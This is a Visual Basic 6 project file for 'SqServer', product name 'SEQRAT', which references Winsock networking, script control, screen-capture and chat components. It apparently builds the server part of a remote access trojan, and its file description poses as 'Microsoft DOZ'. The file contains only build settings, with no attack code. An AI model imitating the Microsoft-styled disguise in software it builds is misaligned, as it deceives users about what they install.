Type=Exe
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={0E59F1D2-1FBE-11D0-8FF2-00A0D10038BC}#1.0#0; msscript.ocx
Form=frmSqServer.frm
Module=modDeclares; modDeclares.bas
Form=frmChat.frm
Class=cDIBSection; cDIBSection_pal.cls
Class=clsZLib; clsZLib.cls
Module=modCapture; modCapture.bas
Class=cPalette; cPalette.cls
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="SqServer"
ExeName32="SqServer.exe"
Command32=""
Name="SqServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=2
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="BY joaquin Encina"
VersionCompanyName="Joakoman Encina"
VersionFileDescription="Microsoft DOZ"
VersionProductName="SEQRAT"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
